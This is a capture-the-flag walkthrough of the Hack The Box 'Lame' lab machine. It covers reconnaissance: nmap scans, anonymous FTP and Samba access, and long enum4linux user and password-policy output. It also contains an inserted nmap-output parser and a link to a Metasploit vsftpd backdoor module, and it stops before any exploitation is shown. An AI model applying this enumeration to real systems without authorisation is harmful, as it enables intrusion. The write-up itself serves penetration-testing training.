Hack The Box: Lame Walkthrough

December 5, 2017 | Walkthrough

Information About Our Target

  • Hostname: Lame
  • IP Address: 10.10.10.3
  • Operating System Family: Linux


Abstract / Overview

This machine’s instance of distcc is vulnerable to a remote code execution attack, which we exploit using Metasploit. We then leverage a setuid nmap installation to escalate our privileges to root.

Information Gathering

Port Scan

1. Surface Scan

We begin with a quick scan of the top 1000 ports, running only nmap’s banner-grabbing script.

Output:


# Nmap 7.60 scan initiated Tue Dec 5 16:23:14 2017 as: nmap -sS -T4 -oA 01-tcp-top1k/top-1k --stats-every 60s --max-retries 3 --top-ports 1000 --script banner --reason 10.10.10.3
Nmap scan report for 10.10.10.3
Host is up, received echo-reply ttl 63 (0.019s latency).
Not shown: 996 filtered ports
Reason: 996 no-responses
PORT STATE SERVICE REASON
21/tcp open ftp syn-ack ttl 63
|_banner: 220 (vsFTPd 2.3.4)
22/tcp open ssh syn-ack ttl 63
|_banner: SSH-2.0-OpenSSH_4.7p1 Debian-8ubuntu1
139/tcp open netbios-ssn syn-ack ttl 63
445/tcp open microsoft-ds syn-ack ttl 63

# Nmap done at Tue Dec 5 16:23:34 2017 -- 1 IP address (1 host up) scanned in 20.24 seconds

We quickly find four open ports. They are the default ports for FTP (TCP 21), SSH (TCP 22), NetBIOS (TCP 139), and Microsoft Directory Service (TCP 445). We haven’t confirmed what is actually listening on any of them yet, in case the creator has been sneaky, but the banners we grabbed make it likely that port 21 really is FTP and port 22 really is SSH.

Seeing SSH should also hint to us that we’re working with a *nix-style system. Windows certainly can run SSH, but in my experience I primarily encounter Remote Desktop Protocol (RDP, TCP 3389) on Windows machines.

2. Deep Scan

Since we have an idea of what the host is running, we can now run a more thorough scan of the host, checking all TCP ports. This takes longer to run, but gives us significantly more information to work with.


# Nmap 7.60 scan initiated Tue Dec 5 16:23:34 2017 as: nmap -sS -T4 -A -oA 02-tcp-full/full-tcp --stats-every 60s --max-retries 3 -p- --reason 10.10.10.3
Nmap scan report for 10.10.10.3
Host is up, received echo-reply ttl 63 (0.020s latency).
Not shown: 65530 filtered ports
Reason: 65530 no-responses
PORT STATE SERVICE REASON VERSION
21/tcp open ftp syn-ack ttl 63 vsftpd 2.3.4
|_ftp-anon: Anonymous FTP login allowed (FTP code 230)
| ftp-syst:
| STAT:
| FTP server status:
| Connected to 10.10.14.5
| Logged in as ftp
| TYPE: ASCII
| No session bandwidth limit
| Session timeout in seconds is 300
| Control connection is plain text
| Data connections will be plain text
| vsFTPd 2.3.4 - secure, fast, stable
|_End of status
22/tcp open ssh syn-ack ttl 63 OpenSSH 4.7p1 Debian 8ubuntu1 (protocol 2.0)
| ssh-hostkey:
| 1024 60:0f:cf:e1:c0:5f:6a:74:d6:90:24:fa:c4:d5:6c:cd (DSA)
|_ 2048 56:56:24:0f:21:1d:de:a7:2b:ae:61:b1:24:3d:e8:f3 (RSA)
139/tcp open netbios-ssn syn-ack ttl 63 Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp open netbios-ssn syn-ack ttl 63 Samba smbd 3.0.20-Debian (workgroup: WORKGROUP)
3632/tcp open distccd syn-ack ttl 63 distccd v1 ((GNU) 4.2.4 (Ubuntu 4.2.4-1ubuntu4))
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Aggressive OS guesses: OpenWrt White Russian 0.9 (Linux 2.4.30) (92%), Linux 2.6.23 (92%), Belkin N300 WAP (Linux 2.6.30) (92%), Control4 HC-300 home controller (92%), D-Link DAP-1522 WAP, or Xerox WorkCentre Pro 245 or 6556 printer (92%), Dell Integrated Remote Access Controller (iDRAC5) (92%), Dell Integrated Remote Access Controller (iDRAC6) (92%), Linksys WET54GS5 WAP, Tranzeo TR-CPQ-19f WAP, or Xerox WorkCentre Pro 265 printer (92%), Linux 2.4.21 - 2.4.31 (likely embedded) (92%), Citrix XenServer 5.5 (Linux 2.6.18) (92%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

Host script results:

| smb-os-discovery:
| OS: Unix (Samba 3.0.20-Debian)

| NetBIOS computer name:
| Workgroup: WORKGROUP\x00
|_ System time: 2017-12-05T16:27:00-05:00
|_smb2-time: Protocol negotiation failed (SMB2)

TRACEROUTE (using port 22/tcp)
HOP RTT ADDRESS
1 19.99 ms 10.10.14.1
2 20.04 ms 10.10.10.3

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Tue Dec 5 16:27:48 2017 -- 1 IP address (1 host up) scanned in 254.08 seconds

This gives us a lot more information to work with and identifies one port we had not seen before: distccd (TCP 3632).
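The two scan tables above are easier to review in structured form. As an added example that is not part of the original post, the following Python parses nmap’s normal text output as printed with --reason (the port table plus the indented NSE script lines such as |_ftp-anon and | ssh-hostkey) and answers the questions a reviewer asks first: which ports are open, what versions were fingerprinted, and whether anonymous FTP was reported. SAMPLE_SCAN is a constructed excerpt of the deep scan shown above.

```python
"""Parse nmap 'normal' output (the -oN / -oA text format shown above).

Added example for this walkthrough, not code from the original post. It reads the
PORT/STATE/SERVICE[/REASON]/VERSION table and the indented NSE script lines
(|_banner, |_ftp-anon, | ssh-hostkey ...) into records a reviewer can query.
"""
import re
from dataclasses import dataclass, field
from typing import Dict, List

# Constructed sample: an excerpt of the deep-scan output shown above.
SAMPLE_SCAN = """\
# Nmap 7.60 scan initiated Tue Dec 5 16:23:34 2017 as: nmap -sS -T4 -A -p- --reason 10.10.10.3
Nmap scan report for 10.10.10.3
Host is up, received echo-reply ttl 63 (0.020s latency).
Not shown: 65530 filtered ports
PORT STATE SERVICE REASON VERSION
21/tcp open ftp syn-ack ttl 63 vsftpd 2.3.4
|_ftp-anon: Anonymous FTP login allowed (FTP code 230)
| ftp-syst:
| STAT:
|_End of status
22/tcp open ssh syn-ack ttl 63 OpenSSH 4.7p1 Debian 8ubuntu1 (protocol 2.0)
| ssh-hostkey:
|_ 2048 56:56:24:0f:21:1d:de:a7:2b:ae:61:b1:24:3d:e8:f3 (RSA)
139/tcp open netbios-ssn syn-ack ttl 63 Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp open netbios-ssn syn-ack ttl 63 Samba smbd 3.0.20-Debian (workgroup: WORKGROUP)
3632/tcp open distccd syn-ack ttl 63 distccd v1 ((GNU) 4.2.4 (Ubuntu 4.2.4-1ubuntu4))
Host script results:
| smb-os-discovery:
|_ System time: 2017-12-05T16:27:00-05:00
"""


@dataclass
class PortRecord:
    port: int
    proto: str
    state: str
    service: str
    reason: str   # "" when the scan was run without --reason
    version: str  # "" when no -sV/-A version string was printed
    scripts: Dict[str, str] = field(default_factory=dict)  # NSE script id -> output


HEADER_RE = re.compile(r"^PORT\s+STATE\s+SERVICE(?P<reason>\s+REASON)?(?:\s+VERSION)?\s*$")
PORT_RE = re.compile(r"^(\d+)/(tcp|udp)\s+(\S+)\s+(\S+)(?:\s+(.*))?$")
# With --reason the remaining columns are "<reason> ttl <n> <version...>".
REASON_RE = re.compile(r"^(\S+)(?:\s+ttl\s+\d+)?\s*(.*)$")
# A new script result starts with a lowercase script id and a colon ("|_ftp-anon: ...");
# indented continuation lines ("| STAT:", "|_ 2048 ...") do not.
SCRIPT_START_RE = re.compile(r"^\|_?\s?(?P<name>[a-z][a-z0-9-]*):\s*(?P<text>.*)$")


def parse_nmap_normal(text: str) -> List[PortRecord]:
    records: List[PortRecord] = []
    has_reason = False
    current = None  # PortRecord that the following "|" lines belong to
    script = None   # script id currently being continued
    for raw in text.splitlines():
        line = raw.rstrip()
        m = HEADER_RE.match(line)
        if m:
            has_reason = m.group("reason") is not None
            continue
        m = PORT_RE.match(line)
        if m:
            port, proto, state, service, rest = m.groups()
            rest = rest or ""
            reason = ""
            if has_reason:
                rm = REASON_RE.match(rest)
                if rm:
                    reason, rest = rm.group(1), rm.group(2)
            current = PortRecord(int(port), proto, state, service, reason, rest.strip())
            records.append(current)
            script = None
            continue
        if line.startswith("Host script results"):
            current = None  # host-level script output is not tied to a port
            continue
        if line.startswith("|") and current is not None:
            m = SCRIPT_START_RE.match(line)
            if m:
                script = m.group("name")
                current.scripts[script] = m.group("text").strip()
            elif script is not None:
                body = line.lstrip("|_").strip()
                current.scripts[script] = (current.scripts[script] + "\n" + body).strip()
    return records


def open_ports(records: List[PortRecord]) -> List[int]:
    return [r.port for r in records if r.state == "open"]


def anonymous_ftp_allowed(records: List[PortRecord]) -> bool:
    """True when the ftp-anon NSE script reported a successful anonymous login."""
    return any("Anonymous FTP login allowed" in r.scripts.get("ftp-anon", "") for r in records)


def service_inventory(records: List[PortRecord]) -> Dict[int, str]:
    """Port -> version string: the list a defender checks against patch levels."""
    return {r.port: r.version for r in records}


if __name__ == "__main__":
    recs = parse_nmap_normal(SAMPLE_SCAN)
    for port, version in service_inventory(recs).items():
        print(f"{port:>5}  {version}")
    print("anonymous FTP allowed:", anonymous_ftp_allowed(recs))
```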

Services

Based on this we know a lot more about the host, and it appears to be running:

  • FTP (TCP 21)
  • SSH (TCP 22)
  • Samba (TCP 139/445)
  • distccd (TCP 3632)

So let’s start off at the top with FTP:

FTP (TCP 21)

FTP is the File Transfer Protocol and is commonly used to send files to and retrieve files from a host. There are a few things we want to check:

  • FTP Banner — Any text we get before the password prompt, if there is any
  • Is anonymous login allowed? — This could allow us to place our own files on the remote host

FTP Banner and Anonymous Login

Luckily, we can collect both of these at once using the ncftp command. Compared to the standard ftp command, ncftp prints the banner for us and attempts an anonymous login automatically. We can see this succeed below:


root@kali:~/Pentest/10.3-lame# ncftp 10.10.10.3
NcFTP 3.2.5 (Feb 02, 2011) by Mike Gleason (http://www.NcFTP.com/contact/).

Copyright (c) 1992-2011 by Mike Gleason.
All rights reserved.

Connecting to 10.10.10.3...
(vsFTPd 2.3.4)
Logging in...
Login successful.
Logged in to 10.10.10.3.
ncftp / >

Nice! We can log in to the server anonymously. This could be useful. Before we move on, let’s take a quick look and see whether anything is exposed to us over FTP:


ncftp / > ls
ncftp / >

Rats, nothing. That sucks, but it could be worse. Let’s do a quick search for vsFTPd 2.3.4 though and see if there is anything we might be able to use.

Hm, multiple exploits show up in our results. This certainly could be useful for us. Let’s give it a quick shot and see if it works:

Exploit: https://www.rapid7.com/db/modules/exploit/unix/ftp/vsftpd_234_backdoor

No luck there for some reason. We can come back to it later though if we run out of other options.

SSH (TCP 22)

SSH is generally a well-tested and secure application. It’s not without its bugs, and it is occasionally exploitable where there are misconfigurations or some kind of backdoor. But for now, we’re going to skip this service and come back to it if we run out of other options.

Samba (TCP 139/445)

Samba is a stable and fast file and print sharing service. Over the years, Samba and the SMB protocol in general have been riddled with vulnerabilities and bugs. The most recent well-known one at the time of writing is the EternalBlue (MS17-010) exploit against Windows machines. Let’s collect some information about this instance of Samba.

First things first, let’s see if anonymous login is allowed and whether we can list the shares that Samba is exposing:


root@kali:~/Pentest/10.3-lame/01-recon/02-smb# smbclient -L 10.10.10.3

WARNING: The "syslog" option is deprecated
Enter WORKGROUP\root's password:
Anonymous login successful

Sharename Type Comment
--------- ---- -------
print$ Disk Printer Drivers
tmp Disk oh noes!
opt Disk
IPC$ IPC IPC Service (lame server (Samba 3.0.20-Debian))
ADMIN$ IPC IPC Service (lame server (Samba 3.0.20-Debian))
Reconnecting with SMB1 for workgroup listing.
Anonymous login successful

Server Comment
--------- -------

Workgroup Master
--------- -------
WORKGROUP LAME

OK, so we see that we might be able to access the tmp and opt shares. We should collect a bit more information before we try those, though. Let’s use enum4linux to try to get more information:


root@kali:~/Pentest/10.3-lame/01-recon/02-smb# enum4linux -a 10.10.10.3

Starting enum4linux v0.8.9 ( http://labs.portcullis.co.uk/application/enum4linux/ ) on Tue Dec 5 16:33:56 2017

==========================
| Target Information |
==========================
Target ........... 10.10.10.3
RID Range ........ 500-550,1000-1050
Username ......... ''
Password ......... ''
Known Usernames .. administrator, guest, krbtgt, domain admins, root, bin, none

==================================================
| Enumerating Workgroup/Domain on 10.10.10.3 |
==================================================
[E] Can't find workgroup/domain

==========================================
| Nbtstat Information for 10.10.10.3 |
==========================================
Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 437.
Looking up status of 10.10.10.3
No reply from 10.10.10.3

===================================
| Session Check on 10.10.10.3 |
===================================
Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 451.
Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 359.
[+] Server 10.10.10.3 allows sessions using username '', password ''
[+] Got domain/workgroup name:

=========================================
| Getting domain SID for 10.10.10.3 |
=========================================
Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 458.
Domain Name: WORKGROUP
Domain Sid: (NULL SID)
[+] Can't determine if host is part of domain or part of a workgroup

====================================
| OS information on 10.10.10.3 |
====================================
Use of uninitialized value $os_info in concatenation (.) or string at ./enum4linux.pl line 464.
Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 467.
[+] Got OS info for 10.10.10.3 from smbclient:
Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 866.
[+] Got OS info for 10.10.10.3 from srvinfo:
LAME Wk Sv PrQ Unx NT SNT lame server (Samba 3.0.20-Debian)
platform_id : 500
os version : 4.9
server type : 0x9a03

===========================
| Users on 10.10.10.3 |
===========================
Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 881.
index: 0x1 RID: 0x3f2 acb: 0x00000011 Account: games Name: games Desc: (null)
index: 0x2 RID: 0x1f5 acb: 0x00000011 Account: nobody Name: nobody Desc: (null)
index: 0x3 RID: 0x4ba acb: 0x00000011 Account: bind Name: (null) Desc: (null)
index: 0x4 RID: 0x402 acb: 0x00000011 Account: proxy Name: proxy Desc: (null)
index: 0x5 RID: 0x4b4 acb: 0x00000011 Account: syslog Name: (null) Desc: (null)
index: 0x6 RID: 0xbba acb: 0x00000010 Account: user Name: just a user,111,, Desc: (null)
index: 0x7 RID: 0x42a acb: 0x00000011 Account: www-data Name: www-data Desc: (null)
index: 0x8 RID: 0x3e8 acb: 0x00000011 Account: root Name: root Desc: (null)
index: 0x9 RID: 0x3fa acb: 0x00000011 Account: news Name: news Desc: (null)
index: 0xa RID: 0x4c0 acb: 0x00000011 Account: postgres Name: PostgreSQL administrator,,, Desc: (null)
index: 0xb RID: 0x3ec acb: 0x00000011 Account: bin Name: bin Desc: (null)
index: 0xc RID: 0x3f8 acb: 0x00000011 Account: mail Name: mail Desc: (null)
index: 0xd RID: 0x4c6 acb: 0x00000011 Account: distccd Name: (null) Desc: (null)
index: 0xe RID: 0x4ca acb: 0x00000011 Account: proftpd Name: (null) Desc: (null)
index: 0xf RID: 0x4b2 acb: 0x00000011 Account: dhcp Name: (null) Desc: (null)
index: 0x10 RID: 0x3ea acb: 0x00000011 Account: daemon Name: daemon Desc: (null)
index: 0x11 RID: 0x4b8 acb: 0x00000011 Account: sshd Name: (null) Desc: (null)
index: 0x12 RID: 0x3f4 acb: 0x00000011 Account: man Name: man Desc: (null)
index: 0x13 RID: 0x3f6 acb: 0x00000011 Account: lp Name: lp Desc: (null)
index: 0x14 RID: 0x4c2 acb: 0x00000011 Account: mysql Name: MySQL Server,,, Desc: (null)
index: 0x15 RID: 0x43a acb: 0x00000011 Account: gnats Name: Gnats Bug-Reporting System (admin) Desc: (null)
index: 0x16 RID: 0x4b0 acb: 0x00000011 Account: libuuid Name: (null) Desc: (null)
index: 0x17 RID: 0x42c acb: 0x00000011 Account: backup Name: backup Desc: (null)
index: 0x18 RID: 0xbb8 acb: 0x00000010 Account: msfadmin Name: msfadmin,,, Desc: (null)
index: 0x19 RID: 0x4c8 acb: 0x00000011 Account: telnetd Name: (null) Desc: (null)
index: 0x1a RID: 0x3ee acb: 0x00000011 Account: sys Name: sys Desc: (null)
index: 0x1b RID: 0x4b6 acb: 0x00000011 Account: klog Name: (null) Desc: (null)
index: 0x1c RID: 0x4bc acb: 0x00000011 Account: postfix Name: (null) Desc: (null)
index: 0x1d RID: 0xbbc acb: 0x00000011 Account: service Name: ,,, Desc: (null)
index: 0x1e RID: 0x434 acb: 0x00000011 Account: list Name: Mailing List Manager Desc: (null)
index: 0x1f RID: 0x436 acb: 0x00000011 Account: irc Name: ircd Desc: (null)
index: 0x20 RID: 0x4be acb: 0x00000011 Account: ftp Name: (null) Desc: (null)
index: 0x21 RID: 0x4c4 acb: 0x00000011 Account: tomcat55 Name: (null) Desc: (null)
index: 0x22 RID: 0x3f0 acb: 0x00000011 Account: sync Name: sync Desc: (null)
index: 0x23 RID: 0x3fc acb: 0x00000011 Account: uucp Name: uucp Desc: (null)

Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 640.
user:[games] rid:[0x3f2] user:[nobody] rid:[0x1f5] user:[bind] rid:[0x4ba] user:[proxy] rid:[0x402] user:[syslog] rid:[0x4b4] user:[user] rid:[0xbba] user:[www-data] rid:[0x42a] user:[root] rid:[0x3e8] user:[news] rid:[0x3fa] user:[postgres] rid:[0x4c0] user:[bin] rid:[0x3ec] user:[mail] rid:[0x3f8] user:[distccd] rid:[0x4c6] user:[proftpd] rid:[0x4ca] user:[dhcp] rid:[0x4b2] user:[daemon] rid:[0x3ea] user:[sshd] rid:[0x4b8] user:[man] rid:[0x3f4] user:[lp] rid:[0x3f6] user:[mysql] rid:[0x4c2] user:[gnats] rid:[0x43a] user:[libuuid] rid:[0x4b0] user:[backup] rid:[0x42c] user:[msfadmin] rid:[0xbb8] user:[telnetd] rid:[0x4c8] user:[sys] rid:[0x3ee] user:[klog] rid:[0x4b6] user:[postfix] rid:[0x4bc] user:[service] rid:[0xbbc] user:[list] rid:[0x434] user:[irc] rid:[0x436] user:[ftp] rid:[0x4be] user:[tomcat55] rid:[0x4c4] user:[sync] rid:[0x3f0] user:[uucp] rid:[0x3fc]

=======================================
| Share Enumeration on 10.10.10.3 |
=======================================
Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 654.
WARNING: The "syslog" option is deprecated

Sharename Type Comment
--------- ---- -------
print$ Disk Printer Drivers
tmp Disk oh noes!
opt Disk
IPC$ IPC IPC Service (lame server (Samba 3.0.20-Debian))
ADMIN$ IPC IPC Service (lame server (Samba 3.0.20-Debian))
Reconnecting with SMB1 for workgroup listing.

Server Comment
--------- -------

Workgroup Master
--------- -------
WORKGROUP LAME

[+] Attempting to map shares on 10.10.10.3
Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 654.
//10.10.10.3/print$ Mapping: DENIED, Listing: N/A
Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 654.
//10.10.10.3/tmp Mapping: OK, Listing: OK
Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 654.
//10.10.10.3/opt Mapping: DENIED, Listing: N/A
Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 654.
//10.10.10.3/IPC$ [E] Can't understand response:
WARNING: The "syslog" option is deprecated
NT_STATUS_NETWORK_ACCESS_DENIED listing \*
//10.10.10.3/ADMIN$ Mapping: DENIED, Listing: N/A

==================================================
| Password Policy Information for 10.10.10.3 |
==================================================
Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 501.

[+] Attaching to 10.10.10.3 using a NULL share

[+] Trying protocol 445/SMB...

[+] Found domain(s):

[+] LAME
[+] Builtin

[+] Password Info for Domain: LAME

[+] Minimum password length: 5
[+] Password history length: None
[+] Maximum password age: Not Set
[+] Password Complexity Flags: 000000

[+] Domain Refuse Password Change: 0
[+] Domain Password Store Cleartext: 0
[+] Domain Password Lockout Admins: 0
[+] Domain Password No Clear Change: 0
[+] Domain Password No Anon Change: 0
[+] Domain Password Complex: 0

[+] Minimum password age: None
[+] Reset Account Lockout Counter: 30 minutes
[+] Locked Account Duration: 30 minutes
[+] Account Lockout Threshold: None
[+] Forced Log off Time: Not Set

Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 542.

[+] Retieved partial password policy with rpcclient:

Password Complexity: Disabled
Minimum Password Length: 0

============================
| Groups on 10.10.10.3 |
============================

[+] Getting builtin groups:
Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 542.

[+] Getting builtin group memberships:

[+] Getting local groups:
Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 593.

[+] Getting local group memberships:

[+] Getting domain groups:
Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 710.

[+] Getting domain group memberships:

=====================================================================
| Users on 10.10.10.3 via RID cycling (RIDS: 500-550,1000-1050) |
=====================================================================
Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 710.
Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 710.
Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 710.
Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 710.
Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 710.
[I] Found new SID: S-1-5-21-2446995257-2525374255-2673161615
Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 710.
Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 742.
Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 834.
[+] Enumerating users using SID S-1-5-21-2446995257-2525374255-2673161615 and logon username '', password ''
Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 834.
S-1-5-21-2446995257-2525374255-2673161615-500 LAME\Administrator (Local User)
Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 834.
S-1-5-21-2446995257-2525374255-2673161615-501 LAME\nobody (Local User)
Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 834.
S-1-5-21-2446995257-2525374255-2673161615-502 *unknown*\*unknown* (8)
Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 834.
S-1-5-21-2446995257-2525374255-2673161615-503 *unknown*\*unknown* (8)
Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 834.
S-1-5-21-2446995257-2525374255-2673161615-504 *unknown*\*unknown* (8)
Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 834.
S-1-5-21-2446995257-2525374255-2673161615-505 *unknown*\*unknown* (8)
Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 834.
S-1-5-21-2446995257-2525374255-2673161615-506 *unknown*\*unknown* (8)
Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 834.
S-1-5-21-2446995257-2525374255-2673161615-507 *unknown*\*unknown* (8)
Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 834.
S-1-5-21-2446995257-2525374255-2673161615-508 *unknown*\*unknown* (8)
Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 834.
S-1-5-21-2446995257-2525374255-2673161615-509 *unknown*\*unknown* (8)
Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 834.
S-1-5-21-2446995257-2525374255-2673161615-510 *unknown*\*unknown* (8)
Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 834.
S-1-5-21-2446995257-2525374255-2673161615-511 *unknown*\*unknown* (8)
Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 834.
S-1-5-21-2446995257-2525374255-2673161615-512 LAME\Domain Admins (Domain Group)
Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 834.
S-1-5-21-2446995257-2525374255-2673161615-513 LAME\Domain Users (Domain Group)
Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 834.
S-1-5-21-2446995257-2525374255-2673161615-514 LAME\Domain Guests (Domain Group)
Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 834.
S-1-5-21-2446995257-2525374255-2673161615-515 *unknown*\*unknown* (8)
Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 834.
S-1-5-21-2446995257-2525374255-2673161615-516 *unknown*\*unknown* (8)
Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 834.
S-1-5-21-2446995257-2525374255-2673161615-517 *unknown*\*unknown* (8)
Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 834.
S-1-5-21-2446995257-2525374255-2673161615-518 *unknown*\*unknown* (8)
Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 834.
S-1-5-21-2446995257-2525374255-2673161615-519 *unknown*\*unknown* (8)
Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 834.
S-1-5-21-2446995257-2525374255-2673161615-520 *unknown*\*unknown* (8)
Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 834.
S-1-5-21-2446995257-2525374255-2673161615-521 *unknown*\*unknown* (8)
Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 834.
S-1-5-21-2446995257-2525374255-2673161615-522 *unknown*\*unknown* (8)
Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 834.
S-1-5-21-2446995257-2525374255-2673161615-523 *unknown*\*unknown* (8)
Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 834.
S-1-5-21-2446995257-2525374255-2673161615-524 *unknown*\*unknown* (8)
Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 834.
S-1-5-21-2446995257-2525374255-2673161615-525 *unknown*\*unknown* (8)
Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 834.
S-1-5-21-2446995257-2525374255-2673161615-526 *unknown*\*unknown* (8)
Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 834.
S-1-5-21-2446995257-2525374255-2673161615-527 *unknown*\*unknown* (8)
Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 834.
S-1-5-21-2446995257-2525374255-2673161615-528 *unknown*\*unknown* (8)
Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 834.
S-1-5-21-2446995257-2525374255-2673161615-529 *unknown*\*unknown* (8)
Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 834.
S-1-5-21-2446995257-2525374255-2673161615-530 *unknown*\*unknown* (8)
Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 834.
S-1-5-21-2446995257-2525374255-2673161615-531 *unknown*\*unknown* (8)
Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 834.
S-1-5-21-2446995257-2525374255-2673161615-532 *unknown*\*unknown* (8)
Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 834.
S-1-5-21-2446995257-2525374255-2673161615-533 *unknown*\*unknown* (8)
Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 834.
S-1-5-21-2446995257-2525374255-2673161615-534 *unknown*\*unknown* (8)
Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 834.
S-1-5-21-2446995257-2525374255-2673161615-535 *unknown*\*unknown* (8)
Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 834.
S-1-5-21-2446995257-2525374255-2673161615-536 *unknown*\*unknown* (8)
Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 834.
S-1-5-21-2446995257-2525374255-2673161615-537 *unknown*\*unknown* (8)
Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 834.
S-1-5-21-2446995257-2525374255-2673161615-538 *unknown*\*unknown* (8)
Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 834.
S-1-5-21-2446995257-2525374255-2673161615-539 *unknown*\*unknown* (8)
Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 834.
S-1-5-21-2446995257-2525374255-2673161615-540 *unknown*\*unknown* (8)
Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 834.
S-1-5-21-2446995257-2525374255-2673161615-541 *unknown*\*unknown* (8)
Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 834.
S-1-5-21-2446995257-2525374255-2673161615-542 *unknown*\*unknown* (8)
Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 834.
S-1-5-21-2446995257-2525374255-2673161615-543 *unknown*\*unknown* (8)
Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 834.
S-1-5-21-2446995257-2525374255-2673161615-544 *unknown*\*unknown* (8)
Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 834.
S-1-5-21-2446995257-2525374255-2673161615-545 *unknown*\*unknown* (8)
Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 834.
S-1-5-21-2446995257-2525374255-2673161615-546 *unknown*\*unknown* (8)
Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 834.
S-1-5-21-2446995257-2525374255-2673161615-547 *unknown*\*unknown* (8)
Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 834.
S-1-5-21-2446995257-2525374255-2673161615-548 *unknown*\*unknown* (8)
Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 834.
S-1-5-21-2446995257-2525374255-2673161615-549 *unknown*\*unknown* (8)
Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 834.
